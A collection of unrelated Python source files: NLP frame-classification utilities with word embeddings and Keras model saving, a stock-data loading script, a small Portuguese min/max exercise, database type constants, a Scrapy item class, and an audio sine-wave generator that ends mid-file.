user_label = re.sub(string=user_label, pattern="(?<=\w)\/(?=\w)", repl=" ", count=1)
final_label_tokens = nltk.word_tokenize(text=user_label, language="english", preserve_line=False)
for i, token in enumerate(final_label_tokens):
token = token.lower()
if token == "v" or token == "v." or token == "vs" or token == "vs.":
final_label_tokens[i] = "versus"
if self.semantic_clustering:
tagged_label = [t_tag for t_tag in nltk.pos_tag(tokens=final_label_tokens, lang="eng", tagset="universal")
if t_tag[0] not in setStopWords]
tagged_label.reverse()
final_label_tokens = [t_tag[0] for t_tag in tagged_label if t_tag[1] == "NOUN"] + \
[t_tag[0] for t_tag in tagged_label if t_tag[1] == "VERB"] + \
[t_tag[0] for t_tag in tagged_label if t_tag[1] not in ["NOUN", "VERB"]]
logger.debug("Converted the user label \"{}\" to \"{}\"", user_label, " ".join(final_label_tokens))
if len(final_label_tokens) > 4:
logger.warning("The label {} has more than 4 tokens: {}. Discard {}", final_label_tokens,
len(final_label_tokens), final_label_tokens[4:])
final_label_tokens = final_label_tokens[:4]
elif len(final_label_tokens) == 0:
logger.warning("We receive an preprocessed user label which is empty!")
final_label_tokens = ["<pad>"] * 4
elif len(final_label_tokens) == 1:
final_label_tokens = final_label_tokens * 4
elif len(final_label_tokens) == 2:
final_label_tokens = final_label_tokens * 2
elif len(final_label_tokens) == 3:
final_label_tokens.append(final_label_tokens[0])
return tuple(final_label_tokens)
def finalize_class_set(self) -> None:
"""
UPDATES THE INTERNAL STRUCTURE
:return: nothing
"""
logger.info("We have {} distinct classes, let's cluster it!", len(self.classes))
logger.debug("Created a cluster instance {} and this will cluster {} samples", self.cluster, self.classes)
try:
assigned_clusters = self.cluster.cluster(vectors=[self.convert_str_list_to_vector(c) for c in self.classes],
assign_clusters=True, trace=not execute_on_ssh_compute)
except Exception:
logger.exception("Failed to cluster the actual class set ({} samples)", len(self.classes))
return
self.classes_to_one_hot_encode_dict.clear()
for i in range(len(self.classes)):
self.classes_to_one_hot_encode_dict[self.classes[i]] = assigned_clusters[i]
def convert_str_list_to_vector(self, string_list: Tuple[str]) -> numpy.ndarray:
"""
FOR INTERNAL USE ONLY!
:param string_list: a tuple list of tokens. Must be exactly 4
:return: a one-dimensional (concatenated) numpy-array. See word embeddings
"""
if len(string_list) != 4:
logger.error("convert_str_list_to_vector got a too short or long string list: {}. We return a zero-vector!",
string_list)
return numpy.zeros(shape=(self.word2vec_embedding_size +
self.word2vec_embedding_size / 2 +
self.word2vec_embedding_size / 3 +
self.word2vec_embedding_size / 4,),
dtype="float32"
)
ret = numpy.zeros(shape=(0,), dtype="float32")
for i, token in enumerate(string_list):
logger.trace("Process the {}. token \"{}\"", (i + 1), string_list[i])
ret = numpy.concatenate([ret,
numpy.average(
numpy.reshape(
self.word2vec_dict.get(string_list[i],
numpy.negative(
numpy.ones(
shape=(self.word2vec_embedding_size,),
dtype="float32")
)),
(int(self.word2vec_embedding_size / (i + 1)), (i + 1))
),
axis=1)],
axis=0)
return ret
def get_y(self, user_label: str) -> numpy.ndarray:
"""
Gets the ground truth one-hot-encoded label for the particular user label
:param user_label: a user label (frame)
:type user_label: str
:return: an numpy array
"""
final_user_label = self.convert_label(user_label=user_label)
if self.cluster_k == -1:
index = self.classes_to_one_hot_encode_dict.get(final_user_label, len(self.classes_to_one_hot_encode_dict))
ret = numpy.zeros(shape=(len(self.classes_to_one_hot_encode_dict) + 1,), dtype="float32")
ret[index] = 1.
return ret
elif self.cluster_k == 1:
return numpy.ones(shape=(1,), dtype="float32")
if final_user_label in self.classes_to_one_hot_encode_dict.keys():
cluster_index = self.classes_to_one_hot_encode_dict[final_user_label]
else:
logger.info("We never saw the converted user_label \"{}\" - predict the cluster for it!",
" ".join(final_user_label))
cluster_index = self.cluster.classify(vector=self.convert_str_list_to_vector(final_user_label))
logger.debug("The cluster index of {} is {} - add it to the dictionary!", final_user_label, cluster_index)
self.classes_to_one_hot_encode_dict[final_user_label] = cluster_index
ret = numpy.zeros(shape=(self.cluster_k,), dtype="float32")
ret[cluster_index] = 1.
return ret
def get_y_length(self) -> int:
"""
:return: the length of a returned vector by self.get_y
"""
if self.cluster_k == -1:
return len(self.classes_to_one_hot_encode_dict) + 1
return self.cluster_k
def __str__(self) -> str:
return "{}{}cluster_{}z{}".format("Semantic" if self.semantic_clustering else "",
"-{}d-".format(self.word2vec_embedding_size)
if self.word2vec_embedding_size != 300 else "",
len(self.classes),
self.get_y_length())
def load_csv(data_set: str, frames: Frames, filter_unknown_frames=True, shuffle_samples=True, under_sampling=False,
limit_data=-1) -> List[dict]:
logger.info("Read data set at {}", os.path.abspath(data_set))
data = []
with open(data_set, newline="\n", encoding="utf-8") as csv_file:
csvReader = csv.reader(csv_file, delimiter="|", quotechar='"')
scheme = None
for row in csvReader:
if csvReader.line_num == 1:
scheme = row
else:
if scheme is None:
logger.error("No scheme!")
raise AttributeError
else:
logger.debug("Fetch {}", ', '.join(row))
argumentMapping = dict()
for i in range(0, len(row)):
try:
argumentMapping[scheme[i]] = row[i]
except IndexError as err:
logger.warning(err)
logger.debug("Collected {} elements.", len(argumentMapping))
data.append(argumentMapping)
if limit_data >= 1:
logger.warning("You want to limit your test data! You want to scale it down to {}", limit_data)
data = data[:limit_data]
logger.info("Took the first {}", len(data))
if under_sampling:
logger.warning("Beware, that the current number of samples ({}) will reduce probably"
"by the activated under-sampling!", len(data))
if shuffle_samples:
random.shuffle(data)
if under_sampling:
distribution = {fn: [] for fn in frames.frame_names}
if not filter_unknown_frames:
distribution["__UNKNOWN__"] = []
for sample in data:
frame = frames.map_user_label_to_generic(sample.get("frame", "FETCH_ERROR"))[0][0]
try:
distribution[frame] += [sample]
except KeyError as e:
logger.debug("Exception {}", type(e))
if filter_unknown_frames:
logger.trace("Unexpected frame: {}", frame)
else:
logger.error("Unexpected frame: {}", frame)
min_frame = min(distribution.items(), key=lambda item: len(item[1]))
if len(min_frame[1]) <= 0:
logger.critical(
"You activated the under-sampling, but frame {} has zero members... Hence, you discard all!",
min_frame[0])
exit(1)
else:
logger.info("Under-sample now... key point is {}", min_frame)
data = []
for frame, samples in distribution.items():
logger.debug("Gather {} samples now for frame \"{}\"", min_frame[1], frame)
data.extend(samples[:len(min_frame[1])])
logger.warning("Your data is reduced to {} samples by under-sampling", len(data))
if shuffle_samples:
random.shuffle(data)
return data
def load_word_embeddings(glove_file: pathlib.Path, embedding_size: int) -> dict:
logger.info("Load word embeddings from \"{}\" ({}d)", glove_file.absolute(), embedding_size)
word_vector_map = dict()
if glove_file.exists():
with glove_file.open(mode="r", encoding="utf-8") as reader:
for line in reader:
word_vector_map[line[:line.index(" ")].strip()] = numpy.fromstring(line[line.index(" "):].strip(),
dtype="float32", sep=" ",
count=embedding_size)
logger.info("Collected {} word embeddings", len(word_vector_map))
else:
logger.critical("Either \"{}\" doesn't exists in general or you forgot to downloaded it!",
glove_file.absolute())
exit(-10)
logger.debug("Loaded {} word embeddings", len(word_vector_map))
return word_vector_map
def prepare_X(arguments: List[dict], max_seq_len: int, word_embedding_dict: dict, word_embedding_length: int,
filter_unknown_frames=False, frame_set=Frames.media_frames_set, using_topic=False, using_premise=True,
using_conclusion=True) -> numpy.ndarray:
assert isinstance(arguments, list)
num_samples = len(arguments)
if filter_unknown_frames:
arguments = [s for s in arguments if s.get("genericFrame", "__UNKNOWN__") in frame_set.frame_names]
logger.info("You ignore unknown frames. This costs you in this section {} samples",
(num_samples - len(arguments)))
num_samples = len(arguments)
ret = numpy.zeros(shape=(num_samples, max_seq_len, word_embedding_length), dtype="float32")
logger.debug("Created a y-output-matrix of shape {}", ret.shape)
for c_r, sample in enumerate(arguments, 0):
arg_string = reduce(lambda arg1, arg2: arg1 + " " + arg2,
argument_to_str(sample, using_topic=using_topic,
using_premise=using_premise, using_conclusion=using_conclusion))
logger.trace("Processes Arg[{}] now", arg_string)
tokens = [t.lower() for t in nltk.word_tokenize(arg_string)]
if len(tokens) > max_seq_len:
if len(tokens) > max_seq_len * 2:
logger.warning("\"{}\" has more then {} tokens: {}. Consider a longer max_length!", arg_string,
max_seq_len, len(tokens))
else:
logger.debug("\"{}\" has more then {} tokens: {}", arg_string, max_seq_len, len(tokens))
tokens = tokens[:max_seq_len]
for t_r, token in enumerate(tokens, 0):
ret[c_r, t_r] = word_embedding_dict.get(token, numpy.ones(shape=(word_embedding_length,)))
logger.debug("Pre-Processed {} X-values now", len(arguments))
return ret
def compute_y_frame_distribution(samples: List[Dict], frames: Union[GenericFrame, UserLabelCluster],
ignore_unknown=False, enable_fuzzy_framing=False) -> numpy.ndarray:
num_samples = len(samples)
if ignore_unknown and isinstance(frames, GenericFrame):
samples = [s for s in samples if s.get("genericFrame", "__UNKNOWN__") in frames.frame_names]
logger.info("You ignore unknown frames. This costs you in this section {} samples",
(num_samples - len(samples)))
num_samples = len(samples)
ret = numpy.zeros(shape=(num_samples,
frames.get_prediction_vector_length(ignore_unknown=ignore_unknown)
if isinstance(frames, GenericFrame) else frames.get_y_length()
),
dtype="float32")
logger.debug("Created a y-output-matrix of shape {}", ret.shape)
for c_r, sample in enumerate(samples, 0):
if isinstance(frames, GenericFrame):
if not enable_fuzzy_framing:
ret[c_r] = frames.decode_frame_label(sample.get("genericFrame", "__UNKNOWN__"),
ignore_unknown=ignore_unknown)
else:
frame_distribution = [frame.strip("() ").split(":", 2) for frame in
str(sample.get("fuzzyFrame", "(__UNKNOWN__:1.0)")).split(") (")]
try:
frame_distribution = {f_d[0]: float(f_d[1]) for f_d in frame_distribution}
ret[c_r] = frames.decode_frame_label(frame_distribution, ignore_unknown=ignore_unknown)
except ValueError as e:
logger.error("Failure {}: leave the {}. prediction vector blank!", e, c_r)
elif isinstance(frames, UserLabelCluster):
ret[c_r] = frames.get_y(user_label=sample.get("frame", "neutral"))
logger.trace("DONE")
return ret
def compute_y_user_label_to_generic_frame_distribution(samples: List[Dict], word2vec: Dict, frames: GenericFrame,
enable_fuzzy_framing=False,
enable_other_class=True) -> numpy.ndarray:
num_samples = len(samples)
model = word_mover_distance.WordEmbedding(model=word2vec)
logger.trace("Created a word_mover_distance-model: {}", model)
frames_tokens = frames.get_all_frame_names(tokenized=True, lower=True)
logger.debug("We will compute the distances to the following frames: {}", ", ".join(frames.frame_names))
ret = numpy.zeros(shape=(num_samples,
frames.get_prediction_vector_length(ignore_unknown=not enable_other_class)),
dtype="float32")
logger.debug("Created a return-template of shape {}", ret.shape)
for i, sample in enumerate(samples):
frame = re.sub(string=sample.get("frame", "unknown").strip("\"' "),
pattern="(?<=\w)\/(?=\w)", repl=" ", count=1)
logger.trace("Fetched a label (user frame): {}", frame)
frame_tokens = [t.lower() for t in nltk.word_tokenize(text=frame, language="english", preserve_line=False)]
logger.trace("Will compute the word-movers-distance to [{}]", "-".join(frame_tokens))
word_movers_distances = numpy.zeros(shape=(frames.get_prediction_vector_length(ignore_unknown=not enable_other_class),),
dtype="float32")
for j, generic_frame_tokens in enumerate(frames_tokens):
word_movers_distances[j] = model.wmdistance(document1=frame_tokens, document2=generic_frame_tokens)
if enable_other_class:
word_movers_distances[-1] = (numpy.max(word_movers_distances)-numpy.min(word_movers_distances[:-1])) *\
word_movers_distances.shape[0] * 0.5
logger.trace("Total distribution: {} (not normalized)", word_movers_distances)
if enable_fuzzy_framing:
word_movers_closeness = numpy.add(numpy.negative(word_movers_distances), numpy.max(word_movers_distances))
ret[i] = numpy.divide(word_movers_closeness, max(numpy.array(0.001, dtype="float32"),
numpy.sum(word_movers_closeness)))
else:
min_index = 0
min_distance = word_movers_distances[0]
for j, d in enumerate(word_movers_distances):
if d < min_distance:
min_index = j
min_distance = d
ret[i, min_index] = 1.0
return ret
def compute_y_word_embedding(samples: List[dict], word_vector_map: dict, embedding_length: int, filter_stop_words=True,
max_seq_len=-1) -> numpy.ndarray:
assert isinstance(samples, list)
assert isinstance(word_vector_map, dict)
num_samples = len(samples)
if max_seq_len <= 0:
ret = numpy.zeros(shape=(num_samples, embedding_length), dtype="float32")
else:
ret = numpy.zeros(shape=(num_samples, max_seq_len, embedding_length), dtype="float32")
logger.debug("Created a y-output-matrix of shape {}", ret.shape)
for c_r, sample in enumerate(samples, 0):
frame = sample.get("frame", None)
if frame is None:
logger.warning("You sample ({}) doesn't provide a [user] frame label - maybe you sent a wrong .csv-file "
"to this, but you have to use the basic csv-file!", sample)
else:
logger.trace("Process the frame \"{}\" now - first the NLP-basic pipeline", frame)
frame = re.sub("(?!-)\W", " ", frame)
frame = frame.strip()
frame = re.sub("\d+", "number", frame)
frame = re.sub("'\w*\s", " ", frame)
tokens = [t for t in nltk.word_tokenize(frame) if not filter_stop_words or t not in setStopWords]
logger.debug("Pre-processing done: \"{}\" -> {}", frame, tokens)
if len(tokens) == 0:
logger.warning("Strange - the user label \"{}\" (clean: \"{}\") does not contain any token!",
sample["frame"], frame)
else:
if max_seq_len <= 0:
embedding_list = [word_vector_map.get(t, numpy.zeros(shape=(embedding_length,))) for t in tokens]
final_embedding = numpy.average(embedding_list, axis=0)
else:
# the cosine similarity of zeros is always 0 (lowest), no matter what we predict.
# This isn't our goal, hence, we decide for
# 1-vector: unknown, but existing token
# -1-vector: not existing token = padding token
embedding_list = [word_vector_map.get(t, numpy.ones(shape=(embedding_length,))) for t in tokens]
final_embedding = embedding_list[:max_seq_len] \
if len(embedding_list) >= max_seq_len else \
(embedding_list +
[numpy.negative(numpy.ones(shape=(embedding_length,)))]
* (max_seq_len - len(embedding_list)))
logger.trace("Final embedding is: {}", final_embedding)
ret[c_r] = final_embedding
return ret
def argument_to_str(input_argument_mapping, using_topic=False, using_premise=True, using_conclusion=True) -> List[str]:
try:
output_argument_list = []
if using_topic:
output_argument_list.append(input_argument_mapping.get("topic", "<unk>"))
if using_premise:
output_argument_list.append(input_argument_mapping.get("premise", "<unk>"))
if using_conclusion:
output_argument_list.append(input_argument_mapping.get("conclusion", "<unk>"))
return output_argument_list
except AttributeError as e:
logger.error("Error {}: the input {} is no (valid) map - maybe you projected the input already?", e,
input_argument_mapping)
# noinspection PyBroadException
def save_model(model: keras.Model, model_save_path=None, additional_metrics_to_plot=None) -> pathlib.Path:
if additional_metrics_to_plot is None:
additional_metrics_to_plot = []
if model_save_path is None:
logger.warning("Utils.save_model receives no model_save_path... try to construct one")
model_save_path = pathlib.Path("trained_model").joinpath(
"{}-{}".format(model.name, round(datetime.datetime.now().timestamp()))
)
try:
model.save(filepath=(model_save_path.absolute()), overwrite=True, save_format="tf")
logger.info("Save the trained model now in \"{}\"", model_save_path.absolute())
except Exception as e:
logger.error("Fail to save the fine-tuned NN in \"{}\", because of {}", model_save_path.absolute(),
type(e))
try:
pickle.dump(model, pathlib.Path("{}.pkl".format(model_save_path)).open(mode="wb"))
except Exception:
logger.error("Failed also to pickle the fine-tuned NN in \"{}\" - give it up...",
"{}.pkl".format(model_save_path))
try:
if model.history is not None:
logger.info("Interesting, \"{}\" has a history... save it!", model.name)
# Plot history
plt.plot(model.history.history["loss"], label='loss (train)')
plt.plot(model.history.history["val_loss"], label='loss (val)')
if len(additional_metrics_to_plot) == 0:
train_acc = "categorical_accuracy" if "categorical_accuracy" in model.history.history.keys() else \
("accuracy" if "accuracy" in model.history.history.keys() else None)
val_acc = "val_categorical_accuracy" if "val_categorical_accuracy" in model.history.history.keys() else \
("val_accuracy" if "val_accuracy" in model.history.history.keys() else None)
try:
if train_acc is not None:
plt.plot(model.history.history[train_acc], label="categorical accuracy (train)")
if val_acc is not None:
plt.plot(model.history.history[val_acc], label="categorical accuracy (val)")
except KeyError as e:
logger.error(e)
train_acc = None
val_acc = None
if train_acc is not None and val_acc is not None:
plt.suptitle(t="Results of {}".format(model.name), fontsize="large", fontweight="demi")
plt.title("top-acc-train: {}/ top-acc-val: {}".format(
round(max(model.history.history[train_acc]), 3),
round(max(model.history.history[val_acc]), 3)))
else:
plt.suptitle(t="Results of {}".format(model.name), fontsize="large", fontweight="book")
plt.title("top-acc-train: {}/ top-acc-val: {}".format(
round(min(model.history.history["loss"]), 3),
round(min(model.history.history["val_loss"]), 3)))
else:
for metric in additional_metrics_to_plot:
if metric in model.history.history.keys():
plt.plot(model.history.history[metric], label=metric)
else:
logger.error(
"You want to plot the metric \"{}\", but its not available in the history, only {}",
metric, ", ".join(model.history.history.keys()))
title_appendix_list = ["{}:{}".format(m, round(max(model.history.history[m]), 3))
for m in additional_metrics_to_plot if m in model.history.history.keys()]
try:
plt.suptitle(t="Results of {}".format(model.name), fontsize="large", fontweight="roman")
plt.title("{}".format("|".join(title_appendix_list[:min(2, len(title_appendix_list))])
if len(title_appendix_list) >= 1 else round(
min(model.history.history["val_loss"]), 3)))
except KeyError as e:
logger.warning("Failure in plot (title): {}", e)
plt.title("Plot of {}".format(model.name))
plt.ylabel('loss/ accuracy')
plt.xlabel('No. epoch')
plt.legend(loc="upper left")
plt.grid(b=True, which="major", axis="y", color="gray", alpha=0.5, animated=False, linestyle="-",
linewidth=1.0)
model_save_path_plot = model_save_path.joinpath("plot.png")
logger.info("Will save plot to {}", model_save_path_plot)
plt.savefig(fname=str(model_save_path_plot.absolute()), transparent=True)
except Exception:
logger.exception("Failed to save the plot")
finally:
return model_save_path
def add_plot_description(additional_text: str, model_save_path: pathlib.Path) -> None:
if additional_text is not None:
remain_text = additional_text
print_text = ""
while len(remain_text) > 0:
print_text += "{}\n".format(remain_text[:min(len(remain_text), 40)])
remain_text = "" if len(remain_text) <= 40 else remain_text[40:]
logger.trace("You want to print additional text on this plot: \"{}\". OK, I will try it!",
additional_text)
plt.figtext(x=0.15, y=0.15, s=print_text)
model_save_path_plot = model_save_path.joinpath("plot.png")
logger.info("Will save plot to {}", model_save_path_plot)
plt.savefig(fname=str(model_save_path_plot.absolute()), transparent=True)
def load_pre_trained_model(path: Optional[pathlib.Path]) -> Optional[keras.Model]:
if path is None:
return None
if path.exists():
try:
return keras.models.load_model(path)
except ImportError as e:
logger.critical("Your given file path \"{}\" don't contain a valid h5-saved model: {}", path.name, e)
except IOError as e:
logger.error("IO-Error: {} (at \"{}\") - can't load the model!", e, path.absolute())
else:
logger.error("Your given path \"{}\" does not exists - no model load!", path.absolute())
return None
def to_same_sample_amount(data_lists: List[List[Dict]], under_sampling=False) -> List[List[Dict]]:
logger.info("You want the same number of samples in corpora [{}]",
", ".join(map(lambda cor: "{} samples".format(len(cor)), data_lists)))
if under_sampling:
min_length = min(data_lists, key=lambda c: len(c))
min_length = len(min_length)
logger.warning("You under-sample! This means, that you will throw data away! Shrink to {}", min_length)
return [cor[:min_length] for cor in data_lists]
else:
logger.debug("Extend the shorter corpora")
len_data_lists = [len(cor) for cor in data_lists]
if all(map(lambda c: c == len_data_lists[0], len_data_lists)):
logger.info("All of your corpora are already equal in the number of samples! Nothing to do!")
return data_lists
else:
max_length = max(len_data_lists)
logger.info("Extend all corpora to a size of {}", max_length)
return [extend_corpus_to_size(cor, max_length) for cor in data_lists]
def extend_corpus_to_size(corpus: List[Dict], size: int) -> List[Dict]:
if len(corpus) >= size:
logger.debug("Nothing to do. The corpus has already the size {}", len(corpus))
return corpus
if len(corpus) == 0:
logger.critical("The input corpus have not to be empty!")
return []
ret = []
while len(ret) < size:
corpus = corpus.copy()
random.shuffle(corpus)
if len(ret) + len(corpus) <= size:
logger.trace("Extended the return list by the full batch of the input list")
ret.extend(corpus)
else:
missing = size - len(ret)
logger.trace("Extended the return list by the partial batch of the input list ({})", missing)
ret.extend(corpus[:missing])
return ret
def return_user_label_specific_word2vec_embedding(word2vec_dict: dict, train_user_labels: [dict],
embedding_length=None) -> dict:
if embedding_length is None:
embedding_length = [i for i in word2vec_dict.values()][0]
if len(embedding_length) == 2:
embedding_length = len(embedding_length[1])
else:
embedding_length = len(embedding_length)
ret = dict()
for user_label in train_user_labels:
user_label = user_label.get("frame", "")
user_label = [word for word in nltk.word_tokenize(text=user_label, language="english") if
word not in setStopWords]
for word in user_label:
if word in ret.keys():
ret[word] = (ret[word][0] + 0, ret[word][1])
else:
word_vector = word2vec_dict.get(word, numpy.ones(shape=(embedding_length,), dtype="float32"))
ret[word] = (1, word_vector)
ret["<padding>"] = (int(len(train_user_labels) / 2),
numpy.negative(numpy.ones(shape=embedding_length, dtype="float32")))
return ret
def calculates_predicted_words_specific_frame(word_vectors_prediction: Union[tensorflow.Tensor, numpy.ndarray],
target_word2vec: dict,
embedding_size=None, output_vector_tensors=False) -> \
[(str, Union[tensorflow.Tensor, numpy.ndarray])]:
target_word2vec_exclude_padding = target_word2vec.copy()
if "<padding>" in target_word2vec:
sample_value = target_word2vec_exclude_padding.pop("<padding>")
else:
sample_key, sample_value = target_word2vec_exclude_padding.popitem()
logger.warning("Your target dictionary ({} keys) doesn't contain the padding-token! Popped \"{}\" instead",
len(target_word2vec), sample_key)
sample_value_is_tuple = True
if len(sample_value) != 2:
sample_value_is_tuple = False
target_word2vec = {k: (1, v) for k, v in target_word2vec.items()}
target_word2vec_exclude_padding = {k: (1, v) for k, v in target_word2vec_exclude_padding.items()}
if embedding_size is None:
logger.debug("We must calculate the embedding size first")
embedding_size = len(sample_value[1] if sample_value_is_tuple else sample_value)
logger.trace("The embedding size is {}", embedding_size)
if len(word_vectors_prediction.shape) == 3:
logger.warning("You consider to input a batch into this function. "
"This function us for single predictions. However, we'll handle this")
return [calculates_predicted_words_specific_frame(word_vectors_prediction=single_prediction,
target_word2vec=target_word2vec,
embedding_size=embedding_size) for single_prediction in
word_vectors_prediction]
elif len(word_vectors_prediction.shape) not in [2, 3]:
logger.error("This function expects a input of shape (word_vector_number, word_vector_vector), "
"but you input a shape of {}!", word_vectors_prediction.shape)
return []
elif word_vectors_prediction.shape[-1] != embedding_size:
logger.error("Expects the same word embedding size, but get as prediction {}d und as dictionary {}d",
word_vectors_prediction.shape[-1], embedding_size)
return []
ret = []
first_token_process = True
if isinstance(word_vectors_prediction, numpy.ndarray):
for word_vector in word_vectors_prediction:
logger.trace("Calculates the cosine similarity with respect to the word frequency."
"Source: https://stackoverflow.com/questions/18424228/cosine-similarity-between-2-number-lists")
cal = [(target_word, target_data[1],
(-1 + numpy.dot(word_vector, target_data[1]) /
(numpy.linalg.norm(word_vector) * numpy.linalg.norm(target_data[1]))) *
(0.7 + (1 / max(1, target_data[0]) * 0.3))) for target_word, target_data
in (target_word2vec_exclude_padding.items() if first_token_process else target_word2vec.items())]
ret.append(max(cal, key=lambda c: c[2])[:2])
logger.trace("Selected from {} the element {}", cal, ret[-1])
elif isinstance(word_vectors_prediction, tensorflow.Tensor):
def cos(fn_word_vector):
nonlocal first_token_process
logger.trace("Calculates the cosine similarity in tensorflow with respect to the word frequency."
"Source: https://stackoverflow.com/questions/18424228/cosine-similarity-between-2-number-lists")
fn_cal = [(target_word, target_data[1],
tensorflow.multiply(
tensorflow.subtract(
tensorflow.divide(
tensorflow.reduce_sum(tensorflow.multiply(fn_word_vector, target_data[1])),
tensorflow.multiply(tensorflow.norm(fn_word_vector),
numpy.linalg.norm(target_data[1]))),
1),
(0.7 + (1 / max(1, target_data[0]) * 0.3))
)
) for target_word, target_data
in (target_word2vec_exclude_padding.items() if first_token_process else target_word2vec.items())]
first_token_process = False
max_elem = fn_cal[0]
if len(fn_cal) >= 2:
for c in fn_cal[1:]:
if tensorflow.reduce_all(tensorflow.math.greater_equal(c[2], max_elem[2])):
max_elem = c
ret.append(max_elem[:2])
return max_elem[1]
first_token_process = True
if output_vector_tensors:
return tensorflow.map_fn(fn=cos, elems=word_vectors_prediction)
else:
tensorflow.map_fn(fn=cos, elems=word_vectors_prediction)
logger.debug(
"Calculated for the current word-vector-prediction the corresponding word \"{}\" out of {} choices",
ret[-1], len(target_word2vec))
logger.info("Finished the mapping process ({} tokens): {}", len(ret), ret)
return ret
|
#!/usr/bin/env python
import datetime
import os
from datetime import timedelta
from stock import stockImport
sk = stockImport()
#start_date = datetime.date(2016, 12, 20)
#today = datetime.date(2016, 12, 30)
#start_date = datetime.date(2009, 9, 25)
#start_date = datetime.date(2004, 2, 11)
stocks = []
scan_date = datetime.date(2016, 12, 1)
X,Y = sk.loadAllTrainDataByStock("2330", scan_date, 30, 7)
print len(X)
print len(Y)
exit(0)
for root, dirs, files in os.walk("bystock/"):
for f in files:
stocks.append(f.split('.')[0])
print stocks
exit(0)
print ("update dataframe from {} to {} ".format(start_date, today))
X = []
Y = []
test_date = datetime.date(2016, 1, 1)
d, r = sk.loadTrainDataByIdFixedRow('2330', test_date, 30, 7)
#print d.tolist()
#print len(d.tolist())
print sum(d.tolist(), [])
#print len(sum(d.tolist(), []))
print r
test_date = datetime.date(2016, 2, 1)
d, r = sk.loadTrainDataByIdFixedRow('2330', test_date, 30, 7)
#print d.tolist()
#print len(d.tolist())
print sum(d.tolist(), [])
#print len(sum(d.tolist(), []))
print r
exit(0)
|
lista = list()
for c in range(1, 6):
lista.append(int(input('Digite Um Numero: ')))
print(f'\nO Menor valor Foi {min(lista)} Na {lista.index(min(lista)) + 1}ª Posição')
print(f'O Maior valor Foi {max(lista)} Na {lista.index(max(lista)) + 1}ª Posição')
|
FORM_NUM = 7
# DATA FORM
DF_SCALAR = 0
DF_VECTOR = 1
DF_PAIR = 2
DF_MATRIX = 3
DF_SET = 4
DF_DICTIONARY = 5
DF_TABLE = 6
DF_CHART = 7
TYPE_NUM = 27
# DATA TYPE
DT_VOID = 0
DT_BOOL = 1
DT_BYTE = 2
DT_SHORT = 3
DT_INT = 4
DT_LONG = 5
DT_DATE = 6
DT_MONTH = 7
DT_TIME = 8
DT_MINUTE = 9
DT_SECOND = 10
DT_DATETIME = 11
DT_TIMESTAMP = 12
DT_NANOTIME = 13
DT_NANOTIMESTAMP = 14
DT_FLOAT = 15
DT_DOUBLE = 16
DT_SYMBOL = 17
DT_STRING = 18
DT_UUID = 19
DT_FUNCTIONDEF = 20
DT_HANDLE = 21
DT_CODE=22
DT_DATASOURCE=23
DT_RESOURCE=24
DT_ANY = 25
DT_DICTIONARY = 26
DT_OBJECT = 27
DT_DATETIME64 = 100
# Data type size
DATA_SIZE = dict()
DATA_SIZE[DT_VOID] = 0
DATA_SIZE[DT_BOOL] = 1
DATA_SIZE[DT_BYTE] = 1
DATA_SIZE[DT_SHORT] = 2
DATA_SIZE[DT_INT] = 4
DATA_SIZE[DT_LONG] = 8
DATA_SIZE[DT_DATE] = 4
DATA_SIZE[DT_MONTH] = 4
DATA_SIZE[DT_TIME] = 4
DATA_SIZE[DT_MINUTE] = 4
DATA_SIZE[DT_SECOND] = 4
DATA_SIZE[DT_DATETIME] = 4
DATA_SIZE[DT_TIMESTAMP] = 8
DATA_SIZE[DT_NANOTIME] = 8
DATA_SIZE[DT_NANOTIMESTAMP] = 8
DATA_SIZE[DT_FLOAT] = 4
DATA_SIZE[DT_DOUBLE] = 8
DATA_SIZE[DT_SYMBOL] = 0
DATA_SIZE[DT_STRING] = 0
DATA_SIZE[DT_ANY] = 0
DATA_SIZE[DT_DICTIONARY] = 0
DATA_SIZE[DT_OBJECT] = 0
## xxdb NAN values
DBNAN = dict()
DBNAN[DT_BYTE] = -128
DBNAN[DT_BOOL] = -128
DBNAN[DT_SHORT] = -32768
DBNAN[DT_INT] = -2147483648
DBNAN[DT_LONG] = -9223372036854775808
DBNAN[DT_FLOAT] = -3.4028234663852886e+38
DBNAN[DT_DOUBLE] = -1.7976931348623157e+308
DBNAN[DT_SYMBOL] = ''
DBNAN[DT_STRING] = ''
DBNAN[DT_DATE] = -2147483648
DBNAN[DT_MONTH] = -2147483648
DBNAN[DT_TIME] = -2147483648
DBNAN[DT_MINUTE] = -2147483648
DBNAN[DT_SECOND] = -2147483648
DBNAN[DT_DATETIME] = -2147483648
DBNAN[DT_TIMESTAMP] = -9223372036854775808
DBNAN[DT_NANOTIME] = -9223372036854775808
DBNAN[DT_NANOTIMESTAMP] = -9223372036854775808
# partition Schema
SEQ=0
VALUE=1
RANGE=2
LIST=3
COMPO=4
HASH =5
|
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class OfferItem(scrapy.Item):
technologies = scrapy.Field()
city = scrapy.Field()
salary = scrapy.Field()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Audio sinusoidal waves generator.
---------------------------------
Can be used to generate waves of the particular frequency,
or sum of all frequencies for frequency response measurements.
"""
import argparse
import numpy
import sounddevice
SAMPLING = 44100 # Hz
def generate_signal(frequency, cycles):
""" Generates samples of the sine wave at specified frequency
over the length of given number of cycles. Amplitude is
scaled down to avoid getting over the <-1; 1> range.
"""
T = 1 / frequency
X = numpy.linspace(0, T, T * SAMPLING)
Y = 0.9 * numpy.sin(2 * numpy.pi * frequency * X)
return numpy.tile(Y, cycles)
def generate_spectral_signal(frequencies, cycles):
""" Generate normalized sum of all given frequencies.
"""
F = [generate_signal(f, cycles) for f in frequencies]
L = [len(f) for f in F]
minLen = min(L)
X = sum(f[:minLen] for f in F)
return X / numpy.max(X)
def compute_spectrum(X, cutoff=numpy.inf):
""" Compute normalized frequency spectrum.
"""
fft = numpy.abs(numpy.fft.fft(X)) / len(X)
fft = fft[range(int(len(X) / 2))]
freq = numpy.fft.fftfreq(len(X), 1.0 / SAMPLING)
freq = freq[range(int(len(X) / 2))]
index = numpy.where(freq < cutoff)[0][-1]
freq = freq[:index]
fft = fft[:index]
return freq[1:], fft[1:]
def configure():
""" Configure sounddevice to use default audio
output device at the given sampling rate.
"""
sounddevice.default.samplerate = SAMPLING
sounddevice.default.device = sounddevice.query_devices()[1]["name"]
def play(frequency, length):
""" Generate signal and play it. This function
blocks until the entire signal is played.
Can be stopped by <Ctrl + C> signal.
"""
signal = generate_signal(frequency, length)
sounddevice.play(signal)
sounddevice.wait()
def play_frequency_spectrum(low, high, cycles):
